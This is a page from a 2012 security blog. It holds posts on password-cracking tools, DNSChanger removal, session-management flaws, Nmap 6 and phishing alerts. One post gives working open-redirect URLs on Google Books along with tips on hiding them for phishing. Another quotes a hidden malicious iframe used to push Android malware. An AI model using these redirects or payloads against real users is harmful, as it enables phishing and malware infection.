Facebook Hacking | Hacking Tools | Facebook Hacking Tool | Twitter Hacking | Crash Website | Hack Gmail Account

Top Password Cracking Tools

Posted by Deepanker Verma Wednesday, May 30, 2012 0 comments

In this post i am going to write about various password cracking tools. These password cracking tools includes, network password cracking, windows password cracking, ftp, http, telnet, IMAP, rlogin, SSH and various other protocol password cracking tools.


These are some popular password cracking tools:


Cain and Abel: This is a free password cracking tool for windows systems. It allows users to recover various kind of passwords. This password cracking tool recover passwords by sniffing the network, cracking encrypted passwords using dictionary, brute-force and crypt-analysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.


John the Ripper: John the Ripper is a fast password crcking tool available for UNIX/Linux and Mac OS X platforms. This is not a free tool but there is a free trail version available to download.


Ophcrack: Ophcrack is a best windows password crcking tool. It is a rainbow-table based windows password cracker.  Features of this cracking tool includes LM and NTLM hash cracking, a GUI, the ability to load hashes from encrypted SAM recovered from a Windows partition, and a Live CD version. 


THC Hydra: THC Hydra is a a remote password cracking tool. It supports various network protocols including telnet, ftp, http, https, smb, several databases, and much more.


Brutus: This Windows-only cracker bangs against network services of remote systems trying to guess passwords by using a dictionary and permutations thereof. It supports HTTP, POP3, FTP, SMB, TELNET, IMAP, NNTP, and more. 


Medusa: Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few.


Aircrack: Aircrack is a famous wireless network password cracking tool. This is a suite of tools for 802.11a/b/g WEP and WPA cracking. It implements the best known cracking algorithms to recover wireless keys once enough encrypted packets have been gathered. . The suite comprises over a dozen discrete tools, including airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).

Remove your Facebook Timeline scams Hitting inbox

Posted by Deepanker Verma Tuesday, May 29, 2012 0 comments

Just after the launch of Facebook, mane users started complaining and searching ways to remove it. Now spammers are also trying to take advantage of this. According to the report published on Nakedsecurity, an email is hitting the inbox and offering users tools to remove timeline.
If you click on this link, it will take you to a website created registered in Turkey. This website also encourages users to install a Firefox or Chrome add-on to remove the Facebook Timeline from your account.


sophos labs is analysing these add-ons to know whether they are malicious or not. Till then, it has given an advice not to use these add-ons and extensions.
When user tries to install these add-ons, it will show terms of use. This is shown in Turkish but there is a linw in english which reads,
"If you are not living in Turkey don't use this plugin, this is for only users who living in Turkey."
This line is confusing why this is only for turkey people.

Collection of best hacking books

Posted by Deepanker Verma Sunday, May 27, 2012 0 comments

If you are curious about learning hacking and want to have some good books, this collection will surely help you. First of all, i want to say few words about Indian readers. Never run after self claimed hackers who always fail to show proof of what they have done. In India, hacking workshop is now a big business. Persons who come as trainer show themselves as big hackers but only few of them have real knowledge. I also know few trainers who arrange this kind of workshops and have great command over what they teaching. But most of the Indian self claimed hackers are fake. They publish hacking books by copying other writers content without giving them credits. There are many big names who have done like this. I am just warning to all of you that hacking books written by those writers are only copy paste material and do not have clear idea about what they are writing. 


If you want to read some original and real material to know what is hacking, these are some best hacking books. You can also download these books by some tools which allow users to download books from Google Books.


Collection of best hacking books


Hacking For Dummies 
By Kevin Beaver, Stuart McClure


Dummies series always have nice books with unique content. This books also covers some basic part of hacking for beginner students. Apart from hacking, this book also covers about internet safety and protection from hackers.


Hacking the Human: Social Engineering Techniques and Security Countermeasures
By Ian Mann


This book covers one of the most powerful attack, social engineering. Social engineering is really a powerful attack and exploit human nature. This book covers sources of risk from social engineering and basis human vulnerabilities.



Ceh Certified Ethical Hacker Study Guide
By Kimberly Graves


This book covers basic about ethical hacking. It is one of the best guides on CEH preparation.



Ethical Hacking and Countermeasures: Linux, Macintosh and Mobile Systems
By Ec-Council


This book is also a nice guide for CEH preparation by EC-Council. EC-Council is one of the best guide that covers topics in offensive network security, ethical hacking, and network defense and countermeasures.



Hands-On Ethical Hacking and Network Defense
By Michael T. Simpson, Kent Backman, James Corley


This book covers penetration testing methodologies in details. This covers all the latest methods of security and penetration testing. Hands-On Ethical Hacking and Network Defense, Second Edition provides a structured knowledge base to prepare readers to be security professionals who understand how to protect a network by using the skills and tools of an ethical hacker.



Hacking: The Art of Exploitation
By Jon Erickson


This is a nice book on hacking written by Jon Erickson who explains how arcane hacking techniques actually work. 




How to remove trojan DNSChanger?

Posted by Deepanker Verma Friday, May 25, 2012 0 comments

What is DNSChanger malware?


Yesterday, i reported that Google will warn users who are affected with DNSChanger trojan. After the post, many readers asked me to write about this Trojan in detail. In this post, i am writing about DNSChanger trojan.


DNSChanger is kind of trojan which changes the DNS (Domain Name System) settings of a system to redirect system to some illegal websites. This trojan changer the nameserver registry key value to a fake IP address. As a result of this change, when a user try to access that website, its computer redirectes the request to that fake IP addresses added by DNSChanger.


How to check your computer?


If you want to check this infection in your system, i am writing some steps for windows system. 
open command prompt. (i assume you know what is command prompt and how to open this.)
Now write


ipconfig /all and press enter.


Now look for the entry "DNS Servers"
See the ip address in front of this and compare them to the 
table of known rogue DNS servers listed below.



85.255.112.0 through 85.255.127.255 
67.210.0.0 through 67.210.15.255
93.188.160.0 through 93.188.167.255
77.67.83.0 through 77.67.83.255
213.109.64.0 through 213.109.79.255
64.28.176.0 through 64.28.191.255


If your computer is configured to use one or more of the rogue DNS servers listed above, your system may be infected with DNSChanger malware.


You can also visit website www.dns-ok.de to check whether your system is infected or not.


How to remove infection?


If your system is infected with DNSChanger, download free DNS changer removal tool from Avira



Follow thse additional steps:

  1. Go to Start --> Control Panel -->Network Connections.
  2. Right click your default connection, usually Local Area Connection or Dial-up Connection, if you are using Dial-up, and left click on Properties.
  3. Double-click on the Internet Protocol (TCP/IP) item and select the radio button that says Obtain DNS servers automatically. Click OK twice.
  4. Go to Start --> Run, type CMD and then click OK.
  5. At the Dos Prompt Screen, type in cd\ and then press ENTER.
  6. Now type in ipconfig /flushdns and then press ENTER. (notice the space after ipconfig)
  7. Close the command prompt window.
  8. Reboot your PC and try to open any website.




Broken Authentication and Session Management

Posted by Deepanker Verma Thursday, May 24, 2012 0 comments

Broken Authentication and Session Management is one of those common web application vulnerabilities which are less known but dangerous. This vulnerability exits in many websites and was also found in some popular website. According OWASP, this vulnerability is third most found vulnerability on the web application.

User authentication and session management is a important part of the websites. Almost each web master tries to make this process as secure as they can. But some flaws in this system can cause big harm. This vulnerability occurs in the web applications when developers fail to protect users' session information within the application. Generally this vulnerability exists when developer use some buggy functions to manage users' session and authentication.

These are some common places in the website where this vulnerability can exists:

 Not authenticating users before changing passwords, relying on the IP address for session, not having adequate timeouts for inactive sessions, weak security in forgotten password, remember my password, account update, and other related functions.

Some websites also use session tokens in the long URLs as get parameters. This is really a bad practice and must be avoided. When user shares this link with some other users, he is also sharing his session ID. In this case other user with valid session will be able to use session of his friend who shared his link.

How to protect web application from this vulnerability: It is really hard for developers to find this vulnerability in their code. So webmasters must hire some professional tester to find this vulnerability in their code.

These are some common ways:
Secure password management and its usage
Use of strong password
Protection of Session ID
Secure transmission of credentials from client to server
Protection against SQL injection and XSS
Proper server configuration

Google Notifying users affected by the DNSChanger

Posted by Deepanker Verma 0 comments

Yesterday, Google has announced that it will now notify users affected with DNSChanger Malware. Users whose system is infected with DNSChanger, will see this warning message when they will search something on Google.




Message on this warning reads, 
"Your computer appears to be infected
We believe that your computer is infected with malicious software. If you don't take action, you might not be able to connect to the internet in future.
Learn how to remove this software."
The DNSChanger malware modifies DNS settings to use malicious servers that point users to fake sites and other harmful locations. DNSChanger malware was used by some cybercriminals to redirect users to some advertising pages and adverts that helped them make money. Although FBI seized control of the servers, and made them harmless. But millions of computers are still affected by this malware.
Best solution to prevent this malware is to fix the DNS settings of your computer. But you should know how to change these settings. This is he reason why Google has decided to join the awareness campaign.


Google said, "Our goal with this notification is to raise awareness of DNSChanger among affected users. We believe directly messaging affected users on a trusted site and in their preferred language will produce the best possible results. While we expect to notify over 500,000 users within a week, we realize we won’t reach every affected user. Some ISPs have been taking their own actions, a few of which will prevent our warning from being displayed on affected devices. We also can’t guarantee that our recommendations will always clean infected devices completely, so some users may need to seek additional help."

Nmap 6 Released – Network Discovery & Security Auditing Tool

Posted by Deepanker Verma Wednesday, May 23, 2012 0 comments



After a long time, finally latest major release of Nmap is available for download. This latest release is version 6 and last v5.20 was Released February 2010.




Nmap is the short name for Network mapper. This is a free and opensource network discovery and security auditing tool. Many systems and network administrators also find it useful for network inventory, managing service upgrade schedules, monitoring host or service uptime, and many other tasks.




Major Improvements in v6.00


NSE Enhanced – The Nmap Scripting Engine (NSE) has exploded in popularity and capabilities. This modular system allows users to automate a wide variety of networking tasks, from querying network applications for configuration information to vulnerability detection and advanced host discovery. The script count has grown from 59 in Nmap 5 to 348 in Nmap 6, and all of them are documented and categorized in our NSE Documentation Portal. The underlying NSE infrastructure has improved dramatically as well.
Better Web Scanning – As the Internet has grown more web-centric, Nmap has developed web scanning capabilities to keep pace. When Nmap was first released in 1997, most of the network services offered by a server listened on individual TCP or UDP ports and could be found with a simple port scan. Now, applications are just as commonly accessed via URL path instead, all sharing a web server listening on a single port. Nmap now includes many techniques for enumerating those applications, as well as performing a wide variety of other HTTP tasks, from web site spidering to brute force authentication cracking. Technologies such as SSL encryption, HTTP pipelining, and caching mechanisms are well supported.
Full IPv6 Support – Given the exhaustion of available IPv4 addresses, the Internet community is trying to move to IPv6. Nmap has been a leader in the transition, offering basic IPv6 support since 2002. But basic support isn’t enough, so we spent many months ensuring that Nmap version 6 contains full support for IP version 6. And we released it just in time for the World IPv6 Launch. We’ve created a new IPv6 OS detection system, advanced host discovery, raw-packet IPv6 port scanning, and many NSE scripts for IPv6-related protocols. It’s easy to use too—just specify the -6 argument along with IPv6 target IP addresses or DNS records. In addition, all of our web sites are now accessible via IPv6. For example, Nmap.org can be found at 2600:3c01::f03c:91ff:fe96:967c.
New Nping Tool – The newest member of the Nmap suite of networking and security tools is Nping, an open source tool for network packet generation, response analysis and response time measurement. Nping can generate network packets for a wide range of protocols, allowing full control over protocol headers. While Nping can be used as a simple ping utility to detect active hosts, it can also be used as a raw packet generator for network stack stress testing, ARP poisoning, Denial of Service attacks, route tracing, etc. Nping’s novel echo mode lets users see how packets change in transit between the source and destination hosts. That’s a great way to understand firewall rules, detect packet corruption, and more.
Better Zenmap GUI results viewer – While Nmap started out as a command-line tool and many (possibly most) users still use it that way, we’ve also developed an enhanced GUI and results viewer named Zenmap. One addition since Nmap 5 is a “filter hosts” feature which allows you to see only the hosts which match your criteria (e.g. Linux boxes, hosts running Apache, etc.) We’ve also localized the GUI to support five languages besides English. A new script selection interface helps you find and execute Nmap NSE scripts. It even tells you what arguments each script supports.
Faster scans – In Nmap’s 15-year history, performance has always been a top priority. Whether scanning one target or a million, users want scans to run as fast as possible without sacrificing accuracy. Since Nmap 5 we’ve rewritten the traceroute system for higher performance and increased the allowed parallelism of the Nmap Scripting Engine and version detection subsystems. We also performed an intense memory audit which reduced peak consumption during our benchmark scan by 90%. We made many improvements to Zenmap data structures and algorithms as well so that it can now handle large enterprise scans with ease.


Read More


Dowload:
Windows: http://nmap.org/dist/nmap-6.00-win32.zip
Linux: http://nmap.org/dist/nmap-6.00.tar.bz2

SQLSentinel v.0.1 released

Posted by Deepanker Verma Saturday, May 19, 2012 0 comments



SQLSentinel is an opensource SQL injection testing tool. This is an automatic tool which helps in finding SQL injection in web applications.






This tool includes a web spider and a sql error finder. It takes the URL of the website and then crawls the website to find the vulnerable parameter for SQL injection error. After it has done with job, it will generate the pdf report which contains the URL found vulnerable.


Download

Google Books open redirection Vulnerability

Posted by Deepanker Verma Wednesday, May 16, 2012 0 comments

Recently i noticed a vulnerability in Google Books which has been merged into Google Play. It has a open redirection vulnerability in http://books.google.com/


I have also reported it to Google security team and got positive reply. But this vulnerability does not fall into Google's reward program and vulnerability still exists on the website.


What is Open Rediection Vulnerability?


If a website have unvalidate redirction then it is called Open redirection vulnerability. Open redirects and forwards is the vulnerability when an attacker uses popular websites URL to redirect the victim to a malicious website. 
This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. 


http://books.google.com/search?btnI&q=http://www.anydomain.com


When any user will click on the above link, he will be redirected to the URL http://www.anydomain.com. Change this according to your redirection URL



http://books.google.com/search?btnI&q=http://www.gmail.com
http://books.google.com/search?btnI&q=http://www.blogger.com



Change this URL to any URL where you want to redirect visitors


Attacker can hide this URL into fake tokens and parameters as below


http://books.google.com/search?btnI&tok=nsvn34t8nv92 n92v5n 939kgdgfnbsjdfbsfsfsfsfsfsbfsbjfbsjfbs&q=http://www.anydomain.com&tic=238758cci4y7y7vvy3v7 rt73vt3v3vvsmdvbgjgjs


This vulnerability only redirect to a .com domain. When i tested with domain with extensions other than .com, it opens a search page for that domain. 


Although this vulnerability does not fall into high risk category, but it can be used for phishing or malware serving.

Hash Code Verifier, A tool to verify the File Integrity

Posted by Deepanker Verma 0 comments



Recenlty i saw a nice tool called Hash Code Verifier developed by BreakTheSecurity Team. This tool is design to create and analyze hashes of their files. This will help to check the integrity of the file on the server.


Now a days, hackers bind trojans with softwares and upload it oon the interent. So most of the download websites also often publish MD5 or SHA hash of the file so that users can ensue that a file has not been modified by checking the file's hash value .






Features:

  1. Verify the Hash of a file
  2. Calculate hash for multiple files
  3. Compare Two files
  4. Simply Drag and drop files from computer into the application for generating hash.
  5. Supports MD5,SHA1,SHA256,SHA512 and CRC32 hash codes.
  6. Save the generated hash list in a text/HTML format
  7. Automatically generate hash when you browse or drop the files.
  8. Yes, it is Cross-platform(You can use this application in any Operating system)
Download Here:

"Your Account Has Been Blocked," New Hotmail Phishing

Posted by Deepanker Verma Monday, May 14, 2012 0 comments

Hotmail users are advised not to open any kind of account alert email. A new phishing attack is trying to steal login details of hotmail users. Users are getting email entitled “E-mail account alert!” which warned users  that their accounts have been blocked. It also contain a link to verify and unblock account. Clicking on the link takes users to a website which asks users to enter their login details.


The message in email reads:
This e-mail has been sent to you by Hotmail to inform you that your account has been blocked.
Why are you seeing this? Someone may have used your account to send out a lot of junk messages (or something else that violates the Windows Live Terms of Service). We're here to help you get your account back. What do you need to do?
We'll ask you to login to our secured activation page by following the link below and re-activate your account.
[Link to phishing website]
If you have already confirmed your account information then please disregard this message.


Users who falls in the scam and click on the link are taken to a fake web page with login form of Windows Live login. If user enters login id and password, he will be taken to the legitimate website.


This is not a new scam for hotmail users. We have already seen many phishing scam for gmail, Facebook, windows Live and hotmail. users only need to see the link before giving login details.

Orion Browser Dumper v1.0 released

Posted by Deepanker Verma Saturday, May 12, 2012 0 comments



Jean-Pierre LESUEUR (DarkCoderSc) releases another Browser Forensic tool for Community called "Orion Browser Dumper v1.0". 


This software is an advanced local browser history extractor (dumper), in less than few seconds (like for Browser Forensic Tool) it will extract the whole history content of most famous web browser, Actually Internet Explorer, Mozilla FireFox, Google Chrome, COMODO Dragon, Rockmelt and Opera.



The software also give you the possibility to edit the default keywords and of course add / modify your own keywords, to separate keywords subject you can create your own keywords categories and only scan for some keywords in the chosen category .


The program is fully asynchronous so it won't affect your work during the scan time nor it will block the customization of keywords and keylist and can be canceled at anytime.
Notice that this software will in any case alter the data, it will just open in read only and in background all history even if archived.



Download and Read More

What is Drive by Download Malware?

Posted by Deepanker Verma Sunday, May 6, 2012 0 comments

There are many posts in my blog when I have posted some malware which use Drive by Download method to infect various system on the internet. But the method Drive by Download seems confusing for many people. This is a requested post which i am writing for those who have sent me mail regarding this post.

Drive by Download is a method which some malware use to infect and spread. This is not a malware type. On internet we visit many websites daily but some website. But some websites trick users to download malicious software which claims to be something else. Sometimes website uses pop-ups to spread this type of infection. Suppose pop-up has a simple message and two buttons saying yes and no. Clicking on any of 2 buttons start downloading some kind of code into your system. These infected pages use some kind of iFrame code to bypass antivirus detection.

Drive-by downloads continue to be a major security issue online. Most of the malwares and spyware use this trick to spread and infecting computers on the internet. Now Google is also taking this issue seriously and warns users if they try to visit any this kind of website from Google.
According to security company Sophos, more than 10,000 infected pages come out daily which spreads different kind of malware with this method.

Many of these infections are connected to botnets, in which each PC is turned into a zombie that may then be directed to further malicious activity, like spam or DDoS attacks.

Drive by install is a similar kind of attack in which website trick users to install some kind of tools into the system. You have seen some tool bars which appears in your browser which you never installed. These are the perfect example of Drive by download. These tool bars are some kind of adwares which changes your homepage and continue opening pop-ups in your computer.

How to avoid drive-by downloads
To minimize the risk of drive-by downloads, you should keep your web browser and your internet security software updated at all times. Also install all Windows patches as soon as they are released and don’t click on links in unsolicited or otherwise dubious e-mails.

New Drive By Download Malware Notcom Infecting Android Devices

Posted by Deepanker Verma 0 comments


A new Android malware, Notcom (NotCompatible) has been discovered which is infecting Android users by Drive By Download on visiting some malicious websites. These malicious website contain a malicious iframe that looks the USER AGENT string on each visitors request.
The iframe code is this:
<iframe style=”visibility: hidden; display: none; display: none;” src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>



If it found an Android visitor, it redirects to the device to download a malicious Android package (APK).


This malware do not install automatically and expect users to download and install. It also tries to disguising itself as a security update.


For infection of this malware your device must have the “Unknown sources” setting enabled (this feature is commonly referred to as “sideloading”).  If the device does not have the unknown sources setting enabled, the installation will be blocked.


According to Lookout Mobile Security analysis report"
"NotCompatible is a new Android trojan that appears to serve as a simple TCP relay / proxy while posing as a system update. This threat does not currently appear to cause any direct harm to a target device, but could potentially be used to gain illicit access to private networks by turning an infected Android device into a proxy. As previously mentioned, this appears to be the first time that compromised websites have been used to distribute malware targeting Android devices."


Unlike many other Android Trojans this trojan only requests network permissions to access interent, but itsintention doesn't appear to be collecting all of your contact details, SMSs, email and other personal details.


All android users are advised not to download any kind of Android app from any unknown source. Always from Google Play store or from trusted vendor. Only use trusted security updates. Never run after free security updates which can be a malware.

Download Browser Forensic Tool v2.0

Posted by Deepanker Verma 0 comments
Browser Forensic Tool v2.0 is an advanced local browser history search engine. This tool will search extract the URLs for chosen keywords from all the famous web browser, actually Internet Explorer, Google Chrome, Mozilla FireFox, RockMelt, Comodo Dragon and Opera.





The program will try to find the URLs in the history title and search for the searched keyword(s). If the keyword is found in title and search URL, it will be display in the search result list with his URL and Title.

The software also give you the possibility to edit the default keywords and of course add / modify your own keywords, to separate keywords subject you can create your own keywords categories and only scan for some keywords in the chosen category.

The program is fully asynchronous so it won't affect your work during the scan time nor it will block the customization of keywords and keylist and can be canceled at anytime.

Notice that this software will in any case alter the data, it will just open in read only and in background all history even if archived.




Fastest password Cracker oclHashcat-plus v0.08 Released

Posted by Deepanker Verma Wednesday, May 2, 2012 0 comments



oclHashcat-plus is Worlds first and only GPGPU based rule engine and Worlds fastest md5crypt, phpass, mscash2 and WPA / WPA2 cracker.






Features

  • Free
  • Multi-GPU (up to 16 gpus)
  • Multi-Hash (up to 24 million hashes)
  • Multi-OS (Linux & Windows native binaries)
  • Multi-Platform (OpenCL & CUDA support)
  • Multi-Algo (see below)
  • Low resource utilization, you can still watch movies or play games while cracking
  • Focuses highly iterated, modern hashes
  • Focuses single dictionary based attacks
  • Supports pause / resume while cracking
  • Supports reading words from file
  • Supports reading words from stdin
  • Integrated thermal watchdog
  • 20+ Algorithms implemented with performance in mind
  • ... and much more


Attack-Modes

  • Straight *
  • Combination
  • Brute-force
  • Permutation
  • Hybrid dict + mask
  • Hybrid mask + dict




Algorithms

  • MD5
  • Joomla
  • osCommerce, xt:Commerce
  • SHA1
  • SHA-1(Base64), nsldap, Netscape LDAP SHA
  • SSHA-1(Base64), nsldaps, Netscape LDAP SSHA
  • Oracle 11g
  • SMF > v1.1
  • OSX v10.4, v10.5, v10.6
  • MSSQL(2000)
  • MSSQL(2005)
  • MySQL
  • phpass, MD5(Wordpress), MD5(phpBB3)
  • md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
  • MD4
  • NTLM
  • DCC, mscash
  • SHA256
  • descrypt, DES(Unix), Traditional DES
  • md5apr1, MD5(APR), Apache MD5
  • SHA512
  • OSX v10.7
  • DCC2, mscash2
  • Cisco-PIX MD5
  • WPA/WPA2
  • Double MD5
  • vBulletin < v3.8.5 vBulletin > v3.8.5
  • IPB2+, MyBB1.2+
  • LM
  • Oracle 7-10g

Featured FREE Resource:




Security Tools

Share
Get This

About Me

My Photo
Deepanker Verma
I am Deepanker Verma. A computer geek, Security researcher blogger and software developer. I have deep interest and Information security and web development and try to learn new things. you will see my blogs on hackingtricks, TechlomediaWebtips and Usethistip.

I was also honoured by Apple, Ebay, Symantec, PandaSecurity and various other computer software giants for my security work for their company. I also contribute on some opensource projects regularly.

I also own a web app called NoteDIP that allows users to send self-destructive messages with password protection.

You can add me to circles to get my daily tips :)

View my complete profile

Partners

Blog Archive